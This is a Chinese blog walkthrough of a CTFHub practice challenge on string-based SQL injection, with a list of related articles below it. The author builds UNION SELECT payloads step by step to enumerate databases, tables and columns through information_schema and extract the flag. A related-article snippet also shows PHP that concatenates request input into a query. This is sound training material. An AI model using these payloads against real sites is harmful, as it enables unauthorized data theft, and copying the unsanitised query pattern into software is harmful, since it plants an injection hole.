CTFHub | web—SQL注入(字符型注入)

最新推荐文章于 2024-06-12 17:05:56 发布
最新推荐文章于 2024-06-12 17:05:56 发布
阅读量276 收藏
点赞数
分类专栏: CTF小白进阶之路 文章标签: 前端 sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76435948/article/details/133321774
版权

CTFHub | web—SQL注入(字符型注入)

字符型注入

一、题目:

在这里插入图片描述
在这里插入图片描述

二、小知识

MySQL数据库常用内置函数
  1. 查看当前连接数据库的用户:user()
  2. 查看当前数据库名:database()
  3. 查看数据库版本:version()
  4. 用户:@@hostname
  5. 数据库的存储位置:@@datadir
  6. 查看服务器的操作系统:@@version_compile_os
  7. 无间隔连接两个字符串并传入数据库:concat(str1, str2)
    例如:select concat(name, password) from user
  8. group_concat(str1, str2) 将多行结果以逗号分隔全部输出
  9. group_ws(‘分隔符’, str1, str2) 用分隔符连接两个字段的字符串
其他
  1. 在MySQL中,schema是数据库,schemata表提供有关数据库的信息。
  2. select schema_name from information_schema.schemata;等价于show databases;
  3. table_schema, table_name等分别是information_schema信息库的字段名

三、题解:

先输入1看看
在这里插入图片描述
有单引号

1. 判断是否存在注入
1. 加单引号 ’

输入:1’’
在这里插入图片描述
无法执行,因为加单引号后变成了三个单引号,最后一个单引号无法成对,所以语句执行失败

2. 输入:’ and 1=1

在这里插入图片描述
注意,–注释符后边有一个空格
因此,构造语句为:select * from table where name =’admin’ and 1=1 – ’ 可成功执行返回结果;

此时仍然无法注入

3. 加 ’and 1=2 –

此时sql语句为:select * from table where name=’admin’ and 1=2 --’ 则会报错
在这里插入图片描述

前段总结

如果满足以上三点,可以判断该url为字符型注入
服务端的sql语句为:select 列 from 数据库.表 where name=‘$name’

2. 判断字段数(即表列数)

order by 列名
列名可以用列的序号(数字)表示

输入:1’ order by 数字

当无法正常显示时,说明字段数小于该数
在这里插入图片描述
在这里插入图片描述
3无显示,所以字段数(即列数)为2

3. 判断显示信息是第几列

输入:’ union select 1,2 – ’

在这里插入图片描述
说明显示的信息在第二列

4. 收集数据库信息(union联合查询)
查询用户权限

输入:’ union select 1, user() – ’

在这里插入图片描述
结果是root用户,说明可访问mysql自带的数据库information_schema,里面有我们想要的数据库名,表名,列名等

爆库
查数据库类型

输入:’ union select 1, version() – ’
在这里插入图片描述
查询结果为:MariaDB,是Mysql的一个分支,可以用mysql查询语句

查当前数据库名(爆库)

输入:’ union select 1, database() – ’

在这里插入图片描述
当前数据库为:sqli

ps: 如果要查所有数据库名

输入:’ union select 1, group_concat(schema_name) from information_schema.schemata – ’
在这里插入图片描述
有information_schema,performance_schema,mysql,sqli

ps:如果要查数据库中表的个数

输入:’ union select table_schema, count(*) from information_schema.tables – ’
在这里插入图片描述
查询结果有161个表

查sqli中的表名

输入:’ union select table_schema, group_concat(table_name) from information_schema.tables where table_schema=‘sqli’ – ’
在这里插入图片描述

查列名

输入:’ union select 1, (select column_name from information_schema.columns where table_schema=‘sqli’ and table_name=‘flag’ limit 0,1) – ’
在这里插入图片描述

查询对应结果

输入:’ union select 1, group_concat(flag) from sqli.flag – ’
在这里插入图片描述
成功找到flag!

剑心诀
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
总结笔记-CTF-SQL注入
qq_39283174的博客
12-22 458
关于SQL注入的相关CTF笔记
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1233
CTFHUB-WEB-SQL注入
CTFHub:web前置技能-SQL注入-整数注入
wdnmddbl的博客
06-08 731
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:sqlmap下载点我文章总结有我个人总结的一些知识点,希望对你有所帮助。大概思路和涉及的知识点sql注入基本语句和手工注入流程:#,–+,-- -代表后边忽略,常用与闭合思路:sql注入之数字注入点:许多网页链接有类似的结构。
CTFHub:web前置技能-SQL注入-字符注入
最新发布
wdnmddbl的博客
06-12 1142
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:sqlmap下载点我文章总结有我个人总结的一些知识点,希望对你有所帮助。练习sql注入,推荐使用sql-labs这个靶场,我后续也会更新从开始搭建到攻略1-75关完整教程,早些关注上车哦。大概思路和涉及的知识点sql注入基本语句和手工注入流程:#,–+,-- -代表后边忽略,常用与闭合思路:字符注入点网页链接有类似的结构。
CTFHub 字符SQL注入
Leon~博客
03-14 4188
字符SQL注入 目录 一、判断是否存在注入 二、判断select语句中有几列 三、判断显示的信息是第几列的信息 四、利用函数来收集数据库信息 五、通过union查询数据库 1、获取所有数据库名称 2、查询数据库中有多少个表 3、查询指定数据库中的表名 4、查询指定数据库指定表中的列名 5、查询指定...
CTFHUB-SQL注入-字符注入
u014794539的博客
07-09 327
考点字符SQL注入 分析过程 先输入个1 因为是字符注入 一般先判断是否存在注入点 加单引号后变成三个单引号,则无法执行 playload: ?id='1'' playload: ’and 1=1 也不行 playload: ' and 1=1 --' 可以成功执行 playload: 'and 1=2 --' 报错 然后判断列数 playload: id='1' order by 3 -- '' id='1' order by 2 -- '' 3时无回显则字段数量为2 查询是第
CTFHUB-SQL字符注入
Web学习之路
03-07 314
很简单的,用心
CTFHUB-web-SQL注入
ookami6497的博客
11-29 808
CTFHUB SQL
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5461
Ctfhub解题 web SQL注入
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 427
个人CTF学习之路
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 573
目录Level 1整数注入字符注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数注入 输入1 and 1=1 和1 and 1=2 输
CTFHub SQL字符注入
weixin_44732566的博客
02-17 3549
CTFHub SQL字符注入 题目说的很清楚,字符注入,需要注意引号和注释 和整数注入一样,回显只有两处:ID和Da,直接上联合查询 123’ union select database(),2 # 得到数据库,接着查表 123' union select group_concat(table_name),3 from information_schema.tables where ta...
ctfhubSQL注入字符注入
manerzi的博客
10-05 347
SQL注入字符注入
CTF入门之SQL注入
PolarPeak的博客
12-08 2221
一、字符注入 <?php require_once('../header.php'); require_once('db.php'); $sql = "SELECT * FROM users where name = '"; $sql .= $_GET['name']."'"; $result = mysql_query($sql); if($result) { ?> <?php while ($row = mysql_fetch_assoc($result)){ echo
CTFHUB-技能树-Web题-SQL注入-字符注入
Static______的博客
03-29 471
对于字符注入,可在url中输入。由此判断回显字段为1,2字段。由此判断字段数为两个。
CTF-sql注入
am_03的博客
08-23 106
在phpstudy里 #为注释 密码随便输入的 还可以输入admin’#(可注释掉) 注意:有的不让输入特殊字符,因为可以绕过验证 在URL处输入网址,在此工具里打开网页,可以点击右上方的扫描网址或者扫描URL 点击后,弹出的信息右键,点击SQL INJECTION POC, 在上方点击,可以获取它的web环境,数据库,命令执行,文件读取,文件上传等等 在下方点击获取信息可得到更多信息,弹出Version,Server,OS,u...
CTF-SQL注入
weixin_44770698的博客
06-16 5180
CTF-SQL注入题目整理
CTF中的SQL注入
weixin_43906500的博客
02-24 346
1 环境配置 见文章:https://blog.csdn.net/weixin_43906500/article/details/114025507 docker-compose.yml version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-sql-1:latest ports: - 80:80 命令执行 docker-compose up -d 2
CTF--SQL注入
woshisz0413的博客
11-27 379
SQL注入思路: 1.是否存在SQL注入测试方法:(1)使用单引号’ (2)sqlmap:sqlmap.py -u http://******* 2.判断过滤的字符 SQL注入方式: (1)单引号’ (2)or/and 1=1 (3)order by --猜测字段长度 (&amp;&amp;与||绕过过滤) 例:order by 1… SQL绕过过滤方式: (1)某一关键字被过滤:1...
ctfhub字符注入
09-18
ctfhub字符注入是一种常见的网络安全漏洞,针对的是Web应用程序中的输入字段,攻击者可以通过注入恶意字符实现对数据库的非法操作或获取敏感信息。 字符注入的原理是利用对用户输入数据的过滤不足,未对特殊...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

剑心诀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值